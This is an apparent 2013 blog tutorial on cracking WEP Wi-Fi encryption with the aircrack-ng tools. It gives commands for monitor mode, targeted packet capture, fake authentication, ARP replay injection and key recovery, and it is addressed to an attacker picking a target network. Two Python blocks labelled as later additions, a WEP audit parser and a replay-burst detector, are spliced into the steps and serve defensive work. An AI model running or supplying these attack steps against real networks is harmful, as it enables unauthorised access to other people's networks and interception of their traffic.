Saturday, April 13, 2013

Hacking WEP

1. Make sure you're not connected to any wireless network.


ifconfig wlan0 down


2. Start Wi-Fi monitor mode. If it succeeds, you'll get a new wireless interface, mon0.


airmon-ng start wlan0


3. Monitor all the Wi-Fi networks around you and look for any that use WEP. Once done, hit "ctrl+c" to stop.


airodump-ng mon0
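The defender's counterpart to this step is a periodic audit of your own site for access points still running WEP so they can be migrated off it. The following is an added example, not code from the original post: it parses the CSV that airodump-ng writes next to its capture (the access-point section; the column layout is assumed from the tool's usual output and the rows are constructed sample data) and lists every AP whose Privacy column reports WEP.

```python
import csv
import io

# Constructed sample in the layout of the access-point table of an airodump-ng
# CSV file (the "-w prefix" run also produces "prefix-01.csv"). The header is
# assumed from the tool's usual output; only the column order matters here.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2013-04-13 10:00:01, 2013-04-13 10:05:30,  2, 54, WEP , WEP, OPN, -40, 120, 3500,   0.  0.  0.  0,   7, LabNet1, 
AA:BB:CC:DD:EE:01, 2013-04-13 10:00:02, 2013-04-13 10:05:31,  6, 54, WPA2, CCMP, PSK, -55,  90,    0,   0.  0.  0.  0,   6, Office, 
AA:BB:CC:DD:EE:02, 2013-04-13 10:00:03, 2013-04-13 10:05:32, 11, 54, OPN , , , -70,  40,    0,   0.  0.  0.  0,   5, Guest, 
"""


def parse_access_points(csv_text):
    """Return one dict per access-point row.

    airodump-ng puts a blank line and then a "Station MAC" table after the AP
    table, so parsing stops at either of those.
    """
    aps = []
    header = None
    for row in csv.reader(io.StringIO(csv_text)):
        cells = [c.strip() for c in row]
        if not cells or cells == [""]:
            if header:          # blank line closes the AP section
                break
            continue
        if cells[0] == "Station MAC":
            break
        if cells[0] == "BSSID":
            header = cells      # column names for the rows that follow
            continue
        if header:
            aps.append(dict(zip(header, cells)))
    return aps


def legacy_wep_access_points(csv_text):
    """(BSSID, ESSID, channel) of every AP whose Privacy column mentions WEP."""
    return [
        (ap["BSSID"], ap["ESSID"], int(ap["channel"]))
        for ap in parse_access_points(csv_text)
        if "WEP" in ap["Privacy"].upper()
    ]


if __name__ == "__main__":
    for bssid, essid, channel in legacy_wep_access_points(SAMPLE_CSV):
        print(f"WEP still enabled: {essid} ({bssid}) on channel {channel}")
```

Run it against the real CSV from your own survey (open the file and pass its contents instead of SAMPLE_CSV); anything it prints is an access point that should be moved to WPA2 or later.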




4. Capture data.


airodump-ng mon0 --bssid yourtargetbssid -c targetchannel -w filenametosave


Example:


airodump-ng mon0 --bssid 00:11:22:33:44:55 -c 2 -w mytarget


5. You must capture at least 25,000 data packets to crack WEP!! This can be done in two ways:


a. PASSIVE ATTACK. Just wait for a client to connect to the AP and start capturing the data packets. This can be very slow, and can take days or even weeks!


b. ACTIVE ATTACK. This method is fast and only takes minutes to generate and inject that many packets. In an active attack you'll have to do a fake authentication to the AP and then generate and inject data packets. For this we're going to use the "aireplay-ng" command:


aireplay-ng -1 3 -a yourtargetbssid interface


Example:


aireplay-ng -1 3 -a 00:11:22:33:44:55 mon0


6. After doing the fake authentication, it is time to generate and inject ARP packets.


aireplay-ng -3 -b yourtargetbssid -h yourwifimacaddress mon0


Example:


aireplay-ng -3 -b 00:11:22:33:44:55 -h 66:55:44:33:22:11 mon0


7. If this step was successful, you will see lots of data packets in the airodump-ng capture. Wait till it reaches at least 25,000 packets. Best would be to wait till it reaches around 80,000-90,000 packets.
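The flood of data packets that step 6 produces is exactly what a wireless IDS keys on: one client address suddenly sending hundreds of encrypted frames of an identical length per second, far beyond anything a real ARP exchange does. The following is an added example, not code from the original post, of that detection logic run over constructed frame records (timestamp in milliseconds, source MAC, frame length) such as a monitoring sensor might log; the addresses and thresholds are made up for the demonstration.

```python
from collections import defaultdict, deque


def build_sample_frames():
    """Constructed sensor log: (timestamp_ms, source MAC, frame length). Not real capture data."""
    frames = []
    # Legitimate client: ~20 frames/s with varying sizes.
    for i in range(200):
        frames.append((i * 50, "aa:bb:cc:dd:ee:01", 100 + (i * 37) % 1400))
    # Replay burst: 600 identical-length frames in 1.2 s from one address.
    for i in range(600):
        frames.append((3000 + i * 2, "66:55:44:33:22:11", 68))
    frames.sort()
    return frames


def detect_replay_bursts(frames, window_ms=1000, threshold=200):
    """Flag sources that send >= threshold frames of one identical length inside
    any sliding window of window_ms. Returns sorted (source, length, peak count).

    A replayed frame is re-sent byte-for-byte, so its length never changes;
    normal traffic from one client mixes many sizes and never reaches this rate.
    """
    recent = defaultdict(deque)     # (src, length) -> timestamps inside the window
    peak = {}                       # (src, length) -> highest count seen
    for ts, src, length in sorted(frames):
        key = (src, length)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window_ms:
            q.popleft()             # drop timestamps that fell out of the window
        if len(q) > peak.get(key, 0):
            peak[key] = len(q)
    return sorted((src, length, n) for (src, length), n in peak.items() if n >= threshold)


if __name__ == "__main__":
    for src, length, count in detect_replay_bursts(build_sample_frames()):
        print(f"replay burst: {src} sent {count} frames of {length} bytes within 1 s")
```

On the sample data only the replaying address is reported; the legitimate client's 200 distinct frame sizes never accumulate under one key. In a real deployment the same check runs on the sensor's per-frame records, and the threshold is set from a baseline of the site's own traffic.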


8. When everything is ready, it is time to crack the WEP key!!! For the name of the capture file, refer to step 4.


aircrack-ng nameofcapturefile


Example:


aircrack-ng mytarget-01.cap
